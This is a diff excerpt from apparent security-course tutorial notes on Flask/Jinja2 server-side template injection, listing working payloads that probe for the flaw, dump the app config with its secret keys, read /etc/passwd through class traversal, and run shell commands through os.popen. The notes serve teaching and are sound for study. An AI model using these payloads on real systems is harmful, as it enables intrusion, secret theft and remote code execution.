HamishWHC/comp6843-23t1-tute/week5/notes.md

     - Check for the vuln: `{{7*6}}`
     - Output Flask config (often includes DB credentials or session secret keys): `{{config}}`
     - Read file: `{{'abc'.__class__.__base__.__subclasses__()[92].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read()}}`
+      - You may have to mess with the indices a bit, e.g. on my Mac you want `111` instead of `92`.
     - Use code from a module (this example is also RCE): `{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}`
   - TBH stole MRO example and most of these payloads from https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/
 - Server Side Request Forgery (SSRF)